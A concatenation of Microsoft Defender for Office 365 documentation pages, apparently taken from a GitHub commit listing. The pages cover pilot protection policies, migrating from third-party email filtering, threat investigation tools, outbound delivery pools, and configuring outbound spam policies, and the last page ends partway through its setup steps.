-
-[Safe Attachments](safe-attachments-about.md) is the easiest Defender for Office 365 feature to enable and test before you switch your MX record. Safe Attachments has the following benefits:
--- Minimal configuration.-- Extremely low chance of false positives.-- Similar behavior to anti-malware protection, which is always on and not affected by the SCL=-1 mail flow rule.-
-For the recommended settings, see [Recommended Safe Attachments policy settings](recommended-settings-for-eop-and-office365.md#safe-attachments-policy-settings). The Standard and Strict recommendations are the same. To create the policy, see [Set up Safe Attachments policies](safe-attachments-policies-configure.md). Be sure to use the group **MDOPilot\_SafeAttachments** as the condition of the policy (who the policy applies to).
-
-> [!NOTE]
-> The **Built-in protection** preset security policy gives Safe Attachments protection to all recipients that aren't defined in any Safe Attachments policies. For more information, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).
-
-### Create pilot Safe Links policies
-
-> [!NOTE]
-> We do not support wrapping or rewriting already wrapped or rewritten links. If your current protection service already wraps or rewrites links in email messages, you need to turn off this feature for your pilot users. One way to ensure this doesn't happen is to exclude the URL domain of the other service in the Safe Links policy.
-
-Chances for false positives in Safe Links are also pretty low, but you should consider testing the feature on a smaller number of pilot users than Safe Attachments. Because the feature impacts the user experience, you should consider a plan to educate users.
-
-For the recommended settings, see [Safe Links policy settings](recommended-settings-for-eop-and-office365.md#safe-links-policy-settings). The Standard and Strict recommendations are the same. To create the policy, see [Set up Safe Links policies](safe-links-policies-configure.md). Be sure to use the group **MDOPilot\_SafeLinks** as the condition of the policy (who the policy applies to).
-
-> [!NOTE]
-> The **Built-in protection** preset security policy gives Safe Links protection to all recipients that aren't defined in any Safe Links policies. For more information, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).
-
-### Create pilot anti-spam policies
-
-Create two anti-spam policies for pilot users:
--- A policy that uses the Standard settings. Use the group **MDOPilot\_SpamPhish\_Standard** as the condition of the policy (who the policy applies to).-- A policy that uses the Strict settings. Use the group **MDOPilot\_SpamPhish\_Strict** as the condition of the policy (who the policy applies to). This policy should have a higher priority (lower number) than the policy with the Standard settings.-
-For the recommended Standard and Strict settings, see [Recommended anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings). To create the policies, see [Configure anti-spam policies](anti-spam-policies-configure.md).
-
-### Create pilot anti-phishing policies
-
-Create two anti-phishing policies for pilot users:
--- A policy that uses the Standard settings, except for impersonation detection actions as described below. Use the group **MDOPilot\_SpamPhish\_Standard** as the condition of the policy (who the policy applies to).-- A policy that uses the Strict settings, except for impersonation detection actions as described below. Use the group **MDOPilot\_SpamPhish\_Strict** as the condition of the policy (who the policy applies to). This policy should have a higher priority (lower number) than the policy with the Standard settings.-
-For spoof detections, the recommended Standard action is **Move the message to the recipients' Junk Email folders**, and the recommended Strict action is **Quarantine the message**. Use the spoof intelligence insight to observe the results. Overrides are explained in the next section. For more information, see [Spoof intelligence insight in EOP](anti-spoofing-spoof-intelligence.md).
-
-For impersonation detections, ignore the recommended Standard and Strict actions for the pilot policies. Instead, use the value **Don't apply any action** for the following settings:
--- **If a message is detected as user impersonation**-- **If message is detected as impersonated domain**-- **If mailbox intelligence detects an impersonated user**-
-Use the impersonation insight to observe the results. For more information, see [Impersonation insight in Defender for Office 365](anti-phishing-mdo-impersonation-insight.md).
-
-Tune spoofing protection (adjust allows and blocks) and turn on each impersonation protection action to quarantine or move the messages to the Junk Email folder (based on the Standard or Strict recommendations). Observe the results and adjust their settings as necessary.
-
-For more information, see the following articles:
--- [Anti-spoofing protection](anti-phishing-protection-spoofing-about.md)-- [Impersonation settings in anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365)-- [Configure anti-phishing policies in Defender for Office 365](anti-phishing-policies-mdo-configure.md).-
-## Next step
-
-**Congratulations**! You've completed the **Setup** phase of your [migration to Microsoft Defender for Office 365](migrate-to-defender-for-office-365.md#the-migration-process)!
--- Proceed to [Phase 3: Onboard](migrate-to-defender-for-office-365-onboard.md).
security Migrate To Defender For Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/migrate-to-defender-for-office-365.md
- Title: Migrate from a third-party protection service to Microsoft Defender for Office 365
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - m365solution-mdo-migration
- - highpri
- - tier1
-
-description: Learn the right way to migrate from third-party protection services or devices to Microsoft Defender for Office 365. For example, Google Postini, the Barracuda Spam and Virus Firewall, or Cisco IronPort.
- Previously updated : 6/15/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 PlanPlan 2</a>
--
-# Migrate from a third-party protection service or device to Microsoft Defender for Office 365
-
-If you already have an existing third-party protection service or device that sits in front of Microsoft 365, you can use this guide to migrate your protection to Microsoft Defender for Office 365. Defender for Office 365 gives you the benefits of a consolidated management experience, potentially reduced cost (using products that you already pay for), and a mature product with integrated security protection. For more information, see [Microsoft Defender for Office 365](https://www.microsoft.com/security/business/threat-protection/office-365-defender).
-
-Watch this short video to learn more about migrating to Defender for Office 365.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWRwfH]
-
-This guide provides specific and actionable steps for your migration, and assumes the following facts:
--- You already have Microsoft 365 mailboxes, but you're currently using a third-party service or device for email protection. Mail from the internet flows through the protection service before delivery into your Microsoft 365 organization. Microsoft 365 protection is as low as possible (it's never completely off. For example, malware protection is always enforced).-
- :::image type="content" source="../../medio-migration-before.png":::
--- You're beyond the investigation and consideration phase for protection by Defender for Office 365. If you need to evaluate Defender for Office 365 to decide whether it's right for your organization, we recommend the options described in [Try Microsoft Defender for Office 365](try-microsoft-defender-for-office-365.md).--- You already purchased Defender for Office 365 licenses.--- You need to retire your existing third-party protection service, which means you ultimately need to point the MX records for your email domains to Microsoft 365. When you're done, mail from the internet flows directly into Microsoft 365 and is protected exclusively by Exchange Online Protection (EOP) and Defender for Office 365.-
- :::image type="content" source="../../medio-migration-after.png":::
-
-Eliminating your existing protection service in favor of Defender for Office 365 is a significant step that you shouldn't take lightly, nor should you rush to make the change. The guidance in this migration guide helps you transition your protection in an orderly manner with minimal disruption to your users.
-
-The high-level migration steps are illustrated in the following diagram. The actual steps are listed in the section named [The migration process](#the-migration-process) later in this article.
--
-## Why use the steps in this guide?
-
-In the IT industry, surprises are bad. Simply flipping your MX records to point to Microsoft 365 without prior and thoughtful testing will result in many surprises. For example:
--- You or your predecessors probably spent time and effort customizing your existing protection service for optimal mail delivery. In other words, blocking what needs to be blocked, and allowing what needs to be allowed. It's almost a guaranteed certainty that not every customization in your current protection service is required in Defender for Office 365. It's also possible that Defender for Office 365 will introduce new issues (allows or blocks) that didn't happen or weren't required in your current protection service.-- Your help desk and security personnel need to know what to do in Defender for Office 365. For example, if a user complains about a missing message, does your help desk know where or how to look for it? They're likely familiar with the tools in your existing protection service, but what about the tools in Defender for Office 365?-
-In contrast, if you follow the steps in this migration guide, you get the following tangible benefits for your migration:
--- Minimal disruption to users.-- Objective data from Defender for Office 365 that you can use to report on the progress and success of the migration to management.-- Early involvement and instruction for help desk and security personnel.-
-The more you familiarize yourself with how Defender for Office 365 will affect your organization, the better the transition will be for users, help desk personnel, security personnel, and management.
-
-This migration guide gives you a plan for gradually "turning the dial". You can monitor and test how Defender for Office 365 affects users and their email so you can react quickly to any issues.
-
-## The migration process
-
-The process of migrating from a third-party protection service to Defender for Office 365 can be divided into three phases as described in the following table:
--
-|Phase|Description|
-|||
-|[Prepare for your migration](migrate-to-defender-for-office-365-prepare.md)|<ol><li>[Inventory the settings at your existing protection service](migrate-to-defender-for-office-365-prepare.md#inventory-the-settings-at-your-existing-protection-service)</li><li>[Check your existing protection configuration in Microsoft 365](migrate-to-defender-for-office-365-prepare.md#check-your-existing-protection-configuration-in-microsoft-365)</li><li>[Check your mail routing configuration](migrate-to-defender-for-office-365-prepare.md#check-your-mail-routing-configuration)</li><li>[Move features that modify messages into Microsoft 365](migrate-to-defender-for-office-365-prepare.md#move-features-that-modify-messages-into-microsoft-365)</li><li>[Define spam and bulk user experiences](migrate-to-defender-for-office-365-prepare.md#define-spam-and-bulk-user-experiences)</li><li>[Identify and designate priority accounts](migrate-to-defender-for-office-365-prepare.md#identify-and-designate-priority-accounts)</li></ol>|
-|[Set up Defender for Office 365](migrate-to-defender-for-office-365-setup.md)|<ol><li>[Create distribution groups for pilot users](migrate-to-defender-for-office-365-setup.md#step-1-create-distribution-groups-for-pilot-users)</li><li>[Configure user reported message settings](migrate-to-defender-for-office-365-setup.md#step-2-configure-user-reported-message-settings)</li><li>[Maintain or create the SCL=-1 mail flow rule](migrate-to-defender-for-office-365-setup.md#step-3-maintain-or-create-the-scl-1-mail-flow-rule)</li><li>[Configure Enhanced Filtering for Connectors](migrate-to-defender-for-office-365-setup.md#step-4-configure-enhanced-filtering-for-connectors)</li><li>[Create pilot protection policies](migrate-to-defender-for-office-365-setup.md#step-5-create-pilot-protection-policies)</li></ol>|
-|[Onboard to Defender for Office 365](migrate-to-defender-for-office-365-onboard.md)|<ol><li>[Begin onboarding Security Teams](migrate-to-defender-for-office-365-onboard.md#step-1-begin-onboarding-security-teams)</li><li>[(Optional) Exempt pilot users from filtering by your existing protection service](migrate-to-defender-for-office-365-onboard.md#step-2-optional-exempt-pilot-users-from-filtering-by-your-existing-protection-service)</li><li>[Tune spoof intelligence](migrate-to-defender-for-office-365-onboard.md#step-3-tune-spoof-intelligence)</li><li>[Tune impersonation protection and mailbox intelligence](migrate-to-defender-for-office-365-onboard.md#step-4-tune-impersonation-protection-and-mailbox-intelligence)</li><li>[Use data from user reported messages to measure and adjust](migrate-to-defender-for-office-365-onboard.md#step-5-use-data-from-user-reported-messages-to-measure-and-adjust)</li><li>[(Optional) Add more users to your pilot and iterate](migrate-to-defender-for-office-365-onboard.md#step-6-optional-add-more-users-to-your-pilot-and-iterate)</li><li>[Extend Microsoft 365 protection to all users and turn off the SCL=-1 mail flow rule](migrate-to-defender-for-office-365-onboard.md#step-7-extend-microsoft-365-protection-to-all-users-and-turn-off-the-scl-1-mail-flow-rule)</li><li>[Switch your MX records](migrate-to-defender-for-office-365-onboard.md#step-8-switch-your-mx-records)</li></ol>|
-
-## Next step
--- Proceed to [Phase 1: Prepare](migrate-to-defender-for-office-365-prepare.md).
security Office 365 Ti https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/office-365-ti.md
- Title: Threat investigation & response capabilities in Microsoft Defender for Office 365
- - NOCSH
--- Previously updated : 10/10/2023-
- - MET150
- - MOE150
-
- - m365-security
- - tier1
-
- - seo-marvel-apr2020
-description: Learn about threat investigation and response capabilities in Microsoft Defender for Office 365 Plan.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Threat investigation and response
--
-Threat investigation and response capabilities in [Microsoft Defender for Office 365](mdo-about.md) help security analysts and administrators protect their organization's Microsoft 365 for business users by:
--- Making it easy to identify, monitor, and understand cyberattacks.-- Helping to quickly address threats in Exchange Online, SharePoint Online, OneDrive for Business and Microsoft Teams.-- Providing insights and knowledge to help security operations prevent cyberattacks against their organization.-- Employing [automated investigation and response in Office 365](air-about.md) for critical email-based threats.-
-Threat investigation and response capabilities provide insights into threats and related response actions that are available in the Microsoft Defender portal. These insights can help your organization's security team protect users from email- or file-based attacks. The capabilities help monitor signals and gather data from multiple sources, such as user activity, authentication, email, compromised PCs, and security incidents. Business decision makers and your security operations team can use this information to understand and respond to threats against your organization and protect your intellectual property.
-
-## Get acquainted with threat investigation and response tools
-
-Threat investigation and response capabilities in the Microsoft Defender portal at <https://security.microsoft.com> are a set of tools and response workflows that include:
--- [Explorer](#explorer)-- [Incidents](#incidents)-- [Attack simulation training](attack-simulation-training-simulations.md)-- [Automated investigation and response](air-about.md)-
-### Explorer
-
-Use [Explorer (and real-time detections)](threat-explorer-real-time-detections-about.md) to analyze threats, see the volume of attacks over time, and analyze data by threat families, attacker infrastructure, and more. Explorer (also referred to as Threat Explorer) is the starting place for any security analyst's investigation workflow.
--
-To view and use this report in the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Explorer**. Or, to go directly to the **Explorer** page, use <https://security.microsoft.com/threatexplorer>.
-
-#### Office 365 Threat Intelligence connection
-
-This feature is only available if you have an active Office 365 E5 or G5 or Microsoft 365 E5 or G5 subscription or the Threat Intelligence add-on. For more information, see the Office 365 Enterprise E5 product page.
-
-Data from Microsoft Defender for Office 365 is incorporated into Microsoft Defender XDR to conduct a comprehensive security investigation across Office 365 mailboxes and Windows devices.
-
-### Incidents
-
-Use the Incidents list (this is also called Investigations) to see a list of in flight security incidents. Incidents are used to track threats such as suspicious email messages, and to conduct further investigation and remediation.
--
-To view the list of current incidents for your organization in the Microsoft Defender portal at <https://security.microsoft.com>, go to **Incidents & alerts** \> **Incidents**. Or, to go directly to the **Incidents** page, use <https://security.microsoft.com/incidents>.
-
-### Attack simulation training
-
-Use Attack simulation training to set up and run realistic cyberattacks in your organization, and identify vulnerable people before a real cyberattack affects your business. To learn more, see [Simulate a phishing attack](attack-simulation-training-simulations.md).
-
-To view and use this feature in the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** > **Attack simulation training**. Or, to go directly to the **Attack simulation training** page, use <https://security.microsoft.com/attacksimulator?viewid=overview>.
-
-### Automated investigation and response
-
-Use automated investigation and response (AIR) capabilities to save time and effort correlating content, devices, and people at risk from threats in your organization. AIR processes can begin whenever certain alerts are triggered, or when started by your security operations team. To learn more, see [automated investigation and response in Office 365](air-examples.md).
-
-## Threat intelligence widgets
-
-As part of the Microsoft Defender for Office 365 Plan 2 offering, security analysts can review details about a known threat. This is useful to determine whether there are additional preventative measures/steps that can be taken to keep users safe.
--
-## How do we get these capabilities?
-
-Microsoft 365 threat investigation and response capabilities are included in Microsoft Defender for Office 365 Plan 2, which is included in Enterprise E5 or as an add-on to certain subscriptions. To learn more, see [Defender for Office 365 Plan 1 vs. Plan 2 cheat sheet](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet).
-
-## Required roles and permissions
-
-Microsoft Defender for Office 365 uses role-based access control. Permissions are assigned through certain roles in Microsoft Entra ID, the Microsoft 365 admin center, or the Microsoft Defender portal.
-
-> [!TIP]
-> Although some roles, such as Security Administrator, can be assigned in the Microsoft Defender portal, consider using either the Microsoft 365 admin center or Microsoft Entra ID instead. For information about roles, role groups, and permissions, see the following resources:
->
-> - [Permissions in the Microsoft Defender portal](mdo-portal-permissions.md)
-> - [Microsoft Entra built-in roles](/entra/identity/role-based-access-control/permissions-reference)
-
-|Activity|Roles and permissions|
-|||
-|Use the Microsoft Defender Vulnerability Management dashboard <p> View information about recent or current threats|One of the following: <ul><li>**Global Administrator**</li><li>**Security Administrator**</li><li>**Security Reader**</li></ul> <br/> These roles can be assigned in either Microsoft Entra ID (<https://portal.azure.com>) or the Microsoft 365 admin center (<https://admin.microsoft.com>).|
-|Use [Explorer (and real-time detections)](threat-explorer-real-time-detections-about.md) to analyze threats|One of the following: <ul><li>**Global Administrator**</li><li>**Security Administrator**</li><li>**Security Reader**</li></ul> <br/> These roles can be assigned in either Microsoft Entra ID (<https://portal.azure.com>) or the Microsoft 365 admin center (<https://admin.microsoft.com>).|
-|View Incidents (also referred to as Investigations) <p> Add email messages to an incident|One of the following: <ul><li>**Global Administrator**</li><li>**Security Administrator**</li><li>**Security Reader**</li></ul> <br/> These roles can be assigned in either Microsoft Entra ID (<https://portal.azure.com>) or the Microsoft 365 admin center (<https://admin.microsoft.com>).|
-|Trigger email actions in an incident <p> Find and delete suspicious email messages|One of the following: <ul><li>**Global Administrator**</li><li>**Security Administrator** plus the **Search and Purge** role</li></ul> <br/> The **Global Administrator** and **Security Administrator** roles can be assigned in either Microsoft Entra ID (<https://portal.azure.com>) or the Microsoft 365 admin center (<https://admin.microsoft.com>). <p> The **Search and Purge** role must be assigned in the **Email & collaboration roles** in the Microsoft 36 Defender portal (<https://security.microsoft.com>).|
-|Integrate Microsoft Defender for Office 365 Plan 2 with Microsoft Defender for Endpoint <p> Integrate Microsoft Defender for Office 365 Plan 2 with a SIEM server|Either the **Global Administrator** or the **Security Administrator** role assigned in either Microsoft Entra ID (<https://portal.azure.com>) or the Microsoft 365 admin center (<https://admin.microsoft.com>). <p> **plus** <p> An appropriate role assigned in additional applications (such as [Microsoft Defender Security Center](/windows/security/threat-protection/microsoft-defender-atp/user-roles) or your SIEM server).|
-
-## Next steps
--- [Threat trackers in Microsoft Defender for Office 365 Plan 2](threat-trackers.md)-- [Find and investigate malicious email that was delivered (Office 365 Threat Investigation and Response)](threat-explorer-investigate-delivered-malicious-email.md)-- [Simulate a phishing attack](attack-simulation-training-simulations.md)
security Outbound Spam High Risk Delivery Pool About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/outbound-spam-high-risk-delivery-pool-about.md
- Title: Outbound delivery pools
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-description: Learn how the delivery pools are used to protect the reputation of email servers in the Microsoft 365 datacenters.
- Previously updated : 11/3/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Outbound delivery pools
--
-Email servers in the Microsoft 365 datacenters might be temporarily guilty of sending spam. For example, a malware or malicious spam attack in an on-premises email organization that sends outbound mail through Microsoft 365, or compromised Microsoft 365 accounts. Attackers also try to avoid detection by relaying messages through Microsoft 365 forwarding.
-
-These scenarios can result in the IP address of the affected Microsoft 365 datacenter servers appearing on third-party blocklists. Destination email organizations that use these blocklists will reject email from those Microsoft 365 messages sources.
-
-## High-risk delivery pool
-
-To prevent our IP addresses from being blocked, all outbound messages from Microsoft 365 datacenter servers that are determined to be spam are sent through the _high-risk delivery pool_.
-
-The high risk delivery pool is a separate IP address pool for outbound email that's only used to send "low quality" messages (for example, spam and [backscatter](anti-spam-backscatter-about.md). Using the high risk delivery pool helps prevent the normal IP address pool for outbound email from sending spam. The normal IP address pool for outbound email maintains the reputation sending "high quality" messages, which reduces the likelihood that these IP addresses appear on IP blocklists.
-
-The possibility that IP addresses in the high-risk delivery pool are placed on IP blocklists remains, but this behavior is by design. Delivery to the intended recipients isn't guaranteed, because many email organizations don't accept messages from the high risk delivery pool.
-
-For more information, see [Control outbound spam](outbound-spam-protection-about.md).
-
-> [!NOTE]
-> Messages where the source email domain has no A record and no MX record defined in public DNS are always routed through the high-risk delivery pool, regardless of their spam or sending limit disposition.
->
-> Messages that exceed the following limits are blocked, so they aren't sent through the high-risk delivery pool:
->
-> - The [sending limits of the service](/office365/servicedescriptions/exchange-online-service-description/exchange-online-limits#sending-limits-across-office-365-options).
-> - [Outbound spam policies](outbound-spam-policies-configure.md) where the senders are restricted from sending mail.
-
-### Bounce messages
-
-The outbound high-risk delivery pool manages the delivery of all non-delivery reports (also known as NDRs or bounce messages). Possible causes for a surge in NDRs include:
--- A spoofing campaign that affects one of the customers using the service.-- A directory harvest attack.-- A spam attack.-- A rogue email server.-
-Any of these issues can result in a sudden increase in the number of NDRs being processed by the service. These NDRs often appear to be spam to other email servers and services (also known as _[backscatter](anti-spam-backscatter-about.md)_).
-
-### Relay pool
-
-In certain scenarios, messages that are forwarded or relayed via Microsoft 365 are sent using a special relay pool, because the destination shouldn't consider Microsoft 365 as the actual sender. It's important for us to isolate this email traffic, because there are legitimate and invalid scenarios for auto forwarding or relaying email out of Microsoft 365. Similar to the high-risk delivery pool, a separate IP address pool is used for relayed mail. This address pool isn't published because it can change often, and it's not part of published SPF record for Microsoft 365.
-
-Microsoft 365 needs to verify that the original sender is legitimate so we can confidently deliver the forwarded message.
-
-The forwarded or relayed message should meet one of the following criteria to avoid using the relay pool:
--- The outbound sender is in an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-- SPF passes when the message comes to Microsoft 365.-- DKIM on the sender domain passes when the message comes to Microsoft 365.-
-You can tell that a message was sent via the relay pool by looking at the outbound server IP (the relay pool is in the 40.95.0.0/16 range).
-
-In cases where we can authenticate the sender, we use Sender Rewriting Scheme (SRS) to help the recipient email system know that the forwarded message is from a trusted source. You can read more about how that works and what you can do to help make sure the sending domain passes authentication in [Sender Rewriting Scheme (SRS) in Office 365](/office365/troubleshoot/antispam/sender-rewriting-scheme).
-
-For DKIM to work, make sure you enable DKIM for sending domain. For example, fabrikam.com is part of contoso.com and is defined in the accepted domains of the organization. If the message sender is sender@fabrikam.com, DKIM needs to be enabled for fabrikam.com. you can read on how to enable at [Use DKIM to validate outbound email sent from your custom domain](email-authentication-dkim-configure.md).
-
-To add a custom domain, follow the steps in [Add a domain to Microsoft 365](/microsoft-365/admin/setup/add-domain).
-
-If the MX record for your domain points to a third party service or an on-premises email server, you should use [Enhanced Filtering for Connectors](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors). Enhanced Filtering ensures SPF validation is correct for inbound mail and avoids sending email through the relay pool.
-
-### Find out which outbound pool was used
-
-As an Exchange Service Administrator or Global Administrator, you might want to find out which outbound pool was used to send a message from Microsoft 365 to an external recipient.
-
-To do so, you can [use Message trace](/exchange/monitoring/trace-an-email-message/message-trace-modern-eac) and look for the `OutboundIpPoolName` property in the output. This property contains a friendly name value for the outbound pool that was used.
security Outbound Spam Policies Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/outbound-spam-policies-configure.md
- Title: Configure outbound spam policies
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can learn how to view, create, modify, and delete outbound spam policies in Exchange Online Protection (EOP).
- Previously updated : 4/8/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Configure outbound spam policies in EOP
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, outbound email messages that are sent through EOP are automatically checked for spam and unusual sending activity.
-
-Outbound spam from a user in your organization typically indicates a compromised account. Suspicious outbound messages are marked as spam (regardless of the spam confidence level or SCL) and are routed through the [high-risk delivery pool](outbound-spam-high-risk-delivery-pool-about.md) to help protect the reputation of the service (that is, to keep Microsoft 365 source email servers off of IP block lists). Admins are automatically notified of suspicious outbound email activity and blocked users via [alert policies](alert-policies-defender-portal.md).
-
-EOP uses outbound spam policies as part of your organization's overall defense against spam. For more information, see [Anti-spam protection](anti-spam-protection-about.md).
-
-The default outbound spam policy automatically applies to all senders. For greater granularity, you can also create custom outbound spam policies that apply to specific users, groups, or domains in your organization.
-
-You can configure outbound spam policies in the Microsoft Defender portal or in PowerShell (Exchange Online PowerShell for Microsoft 365 organizations with mailboxes in Exchange Online; standalone EOP PowerShell for organizations without Exchange Online mailboxes).
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Add, modify, and delete policies_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to policies_: Membership in the **Global Reader**, **Security Reader**, or **View-Only Organization Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- For our recommended settings for outbound spam policies, see [EOP outbound spam policy settings](recommended-settings-for-eop-and-office365.md#eop-outbound-spam-policy-settings).--- The default [alert policies](/purview/alert-policies#threat-management-alert-policies) named **Email sending limit exceeded**, **Suspicious email sending patterns detected**, and **User restricted from sending email** already send email notifications to members of the **TenantAdmins** (**Global admins**) group about unusual outbound email activity and blocked users due to outbound spam. For more information, see [Verify the alert settings for restricted users](outbound-spam-restore-restricted-users.md#verify-the-alert-settings-for-restricted-users). We recommend that you use these alert policies instead of the notification options in outbound spam policies.-
-## Use the Microsoft Defender portal to create outbound spam policies
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-spam** in the **Policies** section. Or, to go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.
-
-2. On the **Anti-spam policies** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create policy** and then select **Outbound** from the dropdown list to start the new outbound spam policy wizard.
-
-3. On the **Name your policy page**, configure these settings:
- - **Name**: Enter a unique, descriptive name for the policy.
- - **Description**: Enter an optional description for the policy.
-
- When you're finished on the **Name your policy page**, select **Next**.
-
-4. On the **Users, groups, and domains** page, identify the internal senders that the policy applies to (recipient conditions):
- - **Users**: The specified mailboxes, mail users, or mail contacts.
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: All senders in the organization with a primary email address in the specified [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).
-
- Click in the appropriate box, start typing a value, and select the value that you want from the results. Repeat this process as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- For users or groups, you can use most identifiers (name, display name, alias, email address, account name, etc.), but the corresponding display name is shown in the results. For users or groups, enter an asterisk (\*) by itself to see all available values.
-
- You can use a condition only once, but the condition can contain multiple values:
-
- - Multiple **values** of the **same condition** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy is applied to them.
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
- - **Exclude these users, groups, and domains**: To add exceptions for the internal senders that the policy applies to, select this option and configure the exceptions.
-
- You can use an exception only once, but the exception can contain multiple values:
-
- - Multiple **values** of the **same exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy isn't applied to them.
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.
-
- When you're finished on the **Users, groups, and domains**, select **Next**.
-
-5. On the **Protection settings** page, configure the following settings:
- - **Message limits** sections: The settings in this section configure the limits for outbound email messages from **Exchange Online** mailboxes:
- - **Set an external message limit**: The maximum number of external recipients per hour.
- - **Set an internal message limit**: The maximum number of internal recipients per hour.
- - **Set a daily message limit**: The maximum total number of recipients per day.
-
- A valid value is 0 to 10000. The default value is 0, which means the service defaults are used. For more information, see [Sending limits](/office365/servicedescriptions/exchange-online-service-description/exchange-online-limits#sending-limits-1).
-
- Enter a value in the box, or use the increase/decrease arrows on the box.
-
- - **Restriction placed on users who reach the message limit**: Select an action from the dropdown list when any of the limits in the **Protection settings** section are exceeded.
-
- For all actions, the senders specified in the **User restricted from sending email** alert policy (and in the now redundant **Notify these users and groups if a sender is blocked due to sending outbound spam** setting on this page) receive email notifications.
-
- - **Restrict the user from sending mail until the following day**: This is the default value. Email notifications are sent, and the user is unable to send any more messages until the following day, based on UTC time. There's no way for the admin to override this block.
- - The alert policy named **User restricted from sending email** notifies admins (via email and on the **Incidents & alerts** \> **View alerts** page).
- - Any recipients specified in the **Notify specific people if a sender is blocked due to sending outbound spam** setting in the policy are also notified.
- - The user is unable to send any more messages until the following day, based on UTC time. There's no way for the admin to override this block.
- - **Restrict the user from sending mail**: Email notifications are sent, the user is added to **Restricted users** <https://security.microsoft.com/restrictedusers> in the Microsoft Defender portal, and the user can't send email until they're removed from **Restricted users** by an admin. After an admin removes the user from the list, the user won't be restricted again for that day. For instructions, see [Remove blocked users from the Restricted entities page](outbound-spam-restore-restricted-users.md).
- - **No action, alert only**: Email notifications are sent.
-
